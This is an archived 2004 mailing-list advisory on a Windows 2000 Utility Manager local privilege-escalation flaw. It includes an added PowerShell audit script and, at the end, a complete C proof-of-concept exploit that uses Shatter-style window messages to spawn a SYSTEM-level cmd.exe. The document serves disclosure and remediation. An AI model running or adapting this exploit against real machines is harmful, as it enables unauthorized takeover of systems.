[VulnWatch] [SHATTER Team Security Alert] Microsoft Windows Utility Manager Vulnerability

From: Vivek Rathod (Application Security, Inc.) (vrathod@private)
Date: Thu Apr 15 2004 - 08:45:52 PDT


    Microsoft Windows Utility Manager Vulnerability
    
    April 13, 2004
    
    Risk Level: High
    
    Summary:
    A local elevation of privilege vulnerability exists in the Windows Utility
    Manager that allows any user to take complete control of the operating
    system.
    
    Versions Affected:
    All products in the Windows 2000 operating system family.
    
    Details:
    Microsoft Windows 2000 contains support for Accessibility options within the
    operating system. Accessibility support is a series of assistive technologies
    within Windows that allow users with disabilities to still be able to access the
    functions of the operating system. Accessibility support is enabled or disabled
    through shortcuts built into the operating system, or through the Accessibility
    Utility Manager. The Utility Manager is an accessibility utility that allows
    users to check the status of Accessibility programs (Magnifier, Narrator,
    On-Screen Keyboard) and start or stop them. The Utility Manager can be invoked by
    pressing Windows Key + U or executing "utilman.exe /start" from the command
    line. The Utility Manager Service is enabled by default and runs in the
    interactive desktop with Local System privileges.
    
    The Utility Manager has support for context sensitive help. Users can access
    this by clicking on the "?" on the title bar and then on an object, or by
    pressing the F1 key after selecting an object. In order to display the help,
    Utility Manager loads winhlp32.exe but does not drop System privileges.
    Therefore, winhlp32.exe is executed under the Local System account. While
    winhlp32.exe is executing it is possible to send Windows messages to it and
    attack it with "Shatter" style attacks.
    
    Winhlp32.exe is executed with its main window hidden, but it is trivial to
    make it visible. Once the window is made visible, a typical attack would
    involve using the "File Open" dialog to execute a program such as "cmd.exe".
    Since the Help window has Local System privileges, the executed program will
    have the same privileges.
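    The condition that makes the attack above possible is a process running as
    Local System while exposing a window on the interactive desktop. The following
    PowerShell audit is an added example, not part of the original advisory or the
    AppSecInc code: it lists windowed processes owned by NT AUTHORITY\SYSTEM and
    flags utilman.exe among them. The function name Get-SystemOwnedWindowedProcess
    is my own; it assumes a Windows host with the CIM cmdlets and an elevated
    session, since querying the owner of another user's process requires it.

```powershell
# Added audit script (not part of the original advisory). Lists processes that
# run as Local System and expose a visible top-level window on the desktop,
# the precondition for the "Shatter" style attack described above.
function Get-SystemOwnedWindowedProcess {
    [CmdletBinding()]
    param()

    # Get-Process only reports a MainWindowHandle for visible windows, so a
    # hidden window (the state winhlp32.exe starts in) is missed by this first
    # pass; treat an empty result as "nothing visible right now", not "safe".
    $windowed = Get-Process | Where-Object { $_.MainWindowHandle -ne 0 }

    foreach ($proc in $windowed) {
        $cim = Get-CimInstance -ClassName Win32_Process -Filter "ProcessId = $($proc.Id)"
        if (-not $cim) { continue }   # process exited between the two queries

        # Win32_Process.GetOwner returns the Domain and User of the process
        # token; ReturnValue 0 means the call succeeded.
        $owner = Invoke-CimMethod -InputObject $cim -MethodName GetOwner
        if ($owner.ReturnValue -ne 0) { continue }

        if ($owner.Domain -eq 'NT AUTHORITY' -and $owner.User -eq 'SYSTEM') {
            # utilman.exe is the process this advisory is about; anything else
            # in the list is a separate privileged process worth reviewing.
            [PSCustomObject]@{
                ProcessId        = $proc.Id
                Name             = $proc.ProcessName
                Owner            = "$($owner.Domain)\$($owner.User)"
                WindowTitle      = $proc.MainWindowTitle
                IsUtilityManager = ($proc.ProcessName -eq 'utilman')
            }
        }
    }
}

# Usage: show the findings as a table. Any row is a privileged process that can
# receive window messages from ordinary desktop applications.
Get-SystemOwnedWindowedProcess | Format-Table -AutoSize
```

    Run the script from an elevated prompt; without elevation GetOwner fails for
    processes of other users and those rows are silently skipped. Applying the
    vendor fix linked below remains the actual remediation; this check only
    confirms whether the exposure described in the advisory is currently present.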
    
    Further information is available at:
    http://www.appsecinc.com/resources/alerts/general/04-0001.html
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908
    http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
    
    Fix:
    http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en
    
    Acknowledgments:
    Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application 
    Security, Inc. (http://www.appsecinc.com) and to
    Brett Moore of Security-Assessment.com (http://security-assessment.com).
    
    Please find the proof-of-concept exploit code attached.
    
    ___________________________________________
    AppSecInc Team SHATTER
    Tel: 1-866-927-7732
    E-mail: shatter@private
    Web: www.appsecinc.com
    
    Application Security, Inc.
    "Securing Business by Securing Enterprise Applications"
    
    
    
    // By Cesar Cerrudo (cesar@private)
    // Local elevation of privileges exploit for Windows Utility Manager
    // Gives you a shell with system privileges
    // If you have problems try changing Sleep() values.
    
    #include <stdio.h>
    #include <windows.h>
    #include <commctrl.h>
    #include <Winuser.h>
    
    int main(int argc, char *argv[])
    {
      HWND lHandle, lHandle2;
      POINT point;
    
      char sText[]="%windir%\\system32\\cmd.ex?";
    
      // run utility manager
      system("utilman.exe /start");
      Sleep(500);
    
      // execute contextual help
      SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
      Sleep(500);
    
      // open the File Open dialog window in Windows Help
      PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
      Sleep(500);
    
      // find open file dialog window
      lHandle = FindWindow("#32770","Open");
    
      // get input box handle
      lHandle2 = GetDlgItem(lHandle, 0x47C);
      Sleep(500);
    
      // set text to filter listview to display only cmd.exe
      SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
      Sleep(800);
    
      // send return
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
    
      // get navigation bar handle
      lHandle2 = GetDlgItem(lHandle, 0x4A0);
      // send tab
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
      Sleep(500);
      lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
      // get list view handle
      lHandle2 = GetDlgItem(lHandle2, 0x1);
    
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
      Sleep(500);
    
      // popup context menu
      PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
      Sleep(1000);
    
      // get context menu handle
      point.x =10; point.y =30;
      lHandle2=WindowFromPoint(point);
    
      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return
    
      SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
    
      return(0);
    }
    



    This archive was generated by hypermail 2b30 : Thu Apr 15 2004 - 09:34:22 PDT